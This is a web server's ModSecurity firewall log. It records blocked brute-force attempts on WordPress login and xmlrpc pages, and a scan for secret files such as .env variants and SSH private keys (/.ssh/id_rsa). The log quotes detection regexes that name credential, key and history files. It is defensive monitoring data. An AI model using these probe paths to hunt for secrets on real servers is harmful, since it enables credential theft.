[Tue May 26 16:02:15.939321 2026] [security2:error] [pid 762634:tid 762845] [client 85.208.96.206:17784] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahV2r7x8rj1VZMqUAOd4JwAAAFE"]
[Tue May 26 16:02:15.981476 2026] [security2:error] [pid 762634:tid 762846] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2r7x8rj1VZMqUAOd4JQAAAFI"], referer: https://jhonweb.com/assets/manifest.json
[Tue May 26 16:02:16.269983 2026] [security2:error] [pid 762634:tid 762867] [client 31.57.184.20:64784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "plenitudotonal.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV2sLx8rj1VZMqUAOd4MQAAAGc"], referer: https://t.co/
[Tue May 26 16:02:16.627386 2026] [security2:error] [pid 762634:tid 762858] [client 31.57.184.20:65245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "plenitudotonal.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV2sLx8rj1VZMqUAOd4OgAAAF4"]
[Tue May 26 16:02:16.696773 2026] [security2:error] [pid 762634:tid 762768] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2sLx8rj1VZMqUAOd4NQAAAAQ"]
[Tue May 26 16:02:17.199293 2026] [security2:error] [pid 762634:tid 762851] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2sLx8rj1VZMqUAOd4RQAAAFc"], referer: https://jhonweb.com/stats.json
[Tue May 26 16:02:17.562143 2026] [security2:error] [pid 762634:tid 762876] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2sbx8rj1VZMqUAOd4SAAAAHA"]
[Tue May 26 16:02:18.241144 2026] [security2:error] [pid 762634:tid 762782] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2srx8rj1VZMqUAOd4ZQAAABI"]
[Tue May 26 16:02:18.378665 2026] [security2:error] [pid 762634:tid 762836] [client 106.219.85.83:16984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2srx8rj1VZMqUAOd4bAAAAEg"]
[Tue May 26 16:02:18.378779 2026] [security2:error] [pid 762634:tid 762836] [client 106.219.85.83:16984] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2srx8rj1VZMqUAOd4bAAAAEg"]
[Tue May 26 16:02:18.910140 2026] [security2:error] [pid 762634:tid 762769] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2srx8rj1VZMqUAOd4fAAAAAU"], referer: https://jhonweb.com/webpack-stats.json
[Tue May 26 16:02:19.127946 2026] [security2:error] [pid 762634:tid 762834] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2srx8rj1VZMqUAOd4fwAAAEY"]
[Tue May 26 16:02:19.432203 2026] [security2:error] [pid 762634:tid 762864] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2s7x8rj1VZMqUAOd4igAAAGQ"]
[Tue May 26 16:02:19.768860 2026] [security2:error] [pid 762634:tid 762799] [client 45.8.19.77:38893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.19.8.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wp-login.php"] [unique_id "ahV2s7x8rj1VZMqUAOd4kAAAACM"]
[Tue May 26 16:02:20.070978 2026] [security2:error] [pid 762634:tid 762815] [client 5.255.126.59:47658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/.env.old"] [unique_id "ahV2tLx8rj1VZMqUAOd4mgAAADM"]
[Tue May 26 16:02:20.158045 2026] [security2:error] [pid 762634:tid 762818] [client 5.255.126.59:47634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/.env.backup"] [unique_id "ahV2tLx8rj1VZMqUAOd4nwAAADY"]
[Tue May 26 16:02:20.160336 2026] [security2:error] [pid 762634:tid 762889] [client 5.255.126.59:47702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/api/.env"] [unique_id "ahV2tLx8rj1VZMqUAOd4pwAAAH0"]
[Tue May 26 16:02:20.168347 2026] [security2:error] [pid 762634:tid 762809] [client 5.255.126.59:47758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/.ssh/id_rsa"] [unique_id "ahV2tLx8rj1VZMqUAOd4owAAAC0"]
[Tue May 26 16:02:20.188190 2026] [security2:error] [pid 762634:tid 762860] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4mQAAAGA"]
[Tue May 26 16:02:20.286462 2026] [security2:error] [pid 762634:tid 762820] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4mAAAADg"], referer: https://jhonweb.com/vault.env
[Tue May 26 16:02:20.304602 2026] [security2:error] [pid 762634:tid 762764] [client 31.57.184.20:50479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "plenitudotonal.com"] [uri "/wp-login.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4tgAAAAA"], referer: https://wordpress.org/
[Tue May 26 16:02:20.315609 2026] [security2:error] [pid 762634:tid 762788] [client 5.255.126.59:47576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4ngAAABg"]
[Tue May 26 16:02:20.325449 2026] [security2:error] [pid 762634:tid 762855] [client 103.44.52.196:44320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4uAAAAFs"]
[Tue May 26 16:02:20.325582 2026] [security2:error] [pid 762634:tid 762855] [client 103.44.52.196:44320] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4uAAAAFs"]
[Tue May 26 16:02:20.328631 2026] [security2:error] [pid 762634:tid 762770] [client 5.255.126.59:47824] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4ogAAAAY"]
[Tue May 26 16:02:20.329274 2026] [security2:error] [pid 762634:tid 762887] [client 5.255.126.59:47876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4nAAAAHs"]
[Tue May 26 16:02:20.330476 2026] [security2:error] [pid 762634:tid 762821] [client 5.255.126.59:47828] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4pAAAADk"]
[Tue May 26 16:02:20.331082 2026] [security2:error] [pid 762634:tid 762813] [client 5.255.126.59:47610] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4mwAAADE"]
[Tue May 26 16:02:20.333112 2026] [security2:error] [pid 762634:tid 762789] [client 5.255.126.59:47934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4oAAAABk"]
[Tue May 26 16:02:20.334106 2026] [security2:error] [pid 762634:tid 762882] [client 5.255.126.59:47918] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4pgAAAHY"]
[Tue May 26 16:02:20.334176 2026] [security2:error] [pid 762634:tid 762841] [client 5.255.126.59:47910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4oQAAAE0"]
[Tue May 26 16:02:20.335293 2026] [security2:error] [pid 762634:tid 762824] [client 5.255.126.59:47806] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4pQAAADw"]
[Tue May 26 16:02:20.340444 2026] [security2:error] [pid 762634:tid 762884] [client 5.255.126.59:47898] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4qAAAAHg"]
[Tue May 26 16:02:20.345998 2026] [security2:error] [pid 762634:tid 762873] [client 5.255.126.59:47770] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4qQAAAG0"]
[Tue May 26 16:02:20.347970 2026] [security2:error] [pid 762634:tid 762830] [client 5.255.126.59:47798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4nQAAAEI"]
[Tue May 26 16:02:20.351573 2026] [security2:error] [pid 762634:tid 762840] [client 5.255.126.59:47808] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4qgAAAEw"]
[Tue May 26 16:02:20.479192 2026] [security2:error] [pid 762634:tid 762835] [client 87.106.152.203:61938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.anujoverseas.in"] [uri "/images/images/cache.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4wAAAAEc"], referer: www.google.com
[Tue May 26 16:02:20.722434 2026] [security2:error] [pid 762634:tid 762808] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4twAAACw"]
[Tue May 26 16:02:20.986768 2026] [security2:error] [pid 762634:tid 762863] [client 191.101.121.251:56009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV2tLx8rj1VZMqUAOd4vwAAAGM"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 16:02:21.149659 2026] [security2:error] [pid 762634:tid 762781] [client 5.255.126.59:47634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/.env"] [unique_id "ahV2tbx8rj1VZMqUAOd42wAAABE"]
[Tue May 26 16:02:21.288447 2026] [security2:error] [pid 762634:tid 762854] [client 5.255.126.59:47876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd42QAAAFo"]
[Tue May 26 16:02:21.296833 2026] [security2:error] [pid 762634:tid 762885] [client 5.255.126.59:47798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd42gAAAHk"]
[Tue May 26 16:02:21.298731 2026] [security2:error] [pid 762634:tid 762781] [client 5.255.126.59:47576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd43gAAABE"]
[Tue May 26 16:02:21.302382 2026] [security2:error] [pid 762634:tid 762876] [client 5.255.126.59:47910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd43AAAAHA"]
[Tue May 26 16:02:21.308564 2026] [security2:error] [pid 762634:tid 762799] [client 5.255.126.59:47658] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd42AAAACM"]
[Tue May 26 16:02:21.310663 2026] [security2:error] [pid 762634:tid 762846] [client 5.255.126.59:47610] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd43QAAAFI"]
[Tue May 26 16:02:21.313385 2026] [security2:error] [pid 762634:tid 762837] [client 5.255.126.59:47702] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd41wAAAEk"]
[Tue May 26 16:02:21.314471 2026] [security2:error] [pid 762634:tid 762819] [client 5.255.126.59:47784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/.ssh/id_dsa"] [unique_id "ahV2tbx8rj1VZMqUAOd46QAAADc"]
[Tue May 26 16:02:21.315567 2026] [security2:error] [pid 762634:tid 762767] [client 5.255.126.59:47556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/.env.bak"] [unique_id "ahV2tbx8rj1VZMqUAOd46gAAAAM"]
[Tue May 26 16:02:21.324003 2026] [security2:error] [pid 762634:tid 762839] [client 5.255.126.59:47758] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd41gAAAEs"]
[Tue May 26 16:02:21.414511 2026] [security2:error] [pid 762634:tid 762782] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd44AAAABI"]
[Tue May 26 16:02:21.463773 2026] [security2:error] [pid 762634:tid 762842] [client 5.255.126.59:47848] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd46wAAAE4"]
[Tue May 26 16:02:21.474567 2026] [security2:error] [pid 762634:tid 762874] [client 5.255.126.59:47592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd47AAAAG4"]
[Tue May 26 16:02:21.475094 2026] [security2:error] [pid 762634:tid 762880] [client 5.255.126.59:47834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd47QAAAHQ"]
[Tue May 26 16:02:21.481678 2026] [security2:error] [pid 762634:tid 762884] [client 5.255.126.59:47824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/backend/.env"] [unique_id "ahV2tbx8rj1VZMqUAOd48gAAAHg"]
[Tue May 26 16:02:21.492685 2026] [security2:error] [pid 762634:tid 762798] [client 5.255.126.59:47806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/public/.env"] [unique_id "ahV2tbx8rj1VZMqUAOd49AAAACI"]
[Tue May 26 16:02:21.492733 2026] [security2:error] [pid 762634:tid 762840] [client 5.255.126.59:47898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/app/.env"] [unique_id "ahV2tbx8rj1VZMqUAOd48wAAAEw"]
[Tue May 26 16:02:21.605117 2026] [security2:error] [pid 762634:tid 762821] [client 5.255.126.59:47918] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd47wAAADk"]
[Tue May 26 16:02:21.625589 2026] [security2:error] [pid 762634:tid 762789] [client 5.255.126.59:47934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd48AAAABk"]
[Tue May 26 16:02:21.626531 2026] [security2:error] [pid 762634:tid 762841] [client 5.255.126.59:47828] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd48QAAAE0"]
[Tue May 26 16:02:21.639285 2026] [security2:error] [pid 762634:tid 762814] [client 5.255.126.59:47770] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd49QAAADI"]
[Tue May 26 16:02:21.656137 2026] [security2:error] [pid 762634:tid 762835] [client 5.255.126.59:47808] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd49gAAAEc"]
[Tue May 26 16:02:21.666518 2026] [security2:error] [pid 762634:tid 762887] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2tbx8rj1VZMqUAOd47gAAAHs"], referer: https://jhonweb.com/key.json
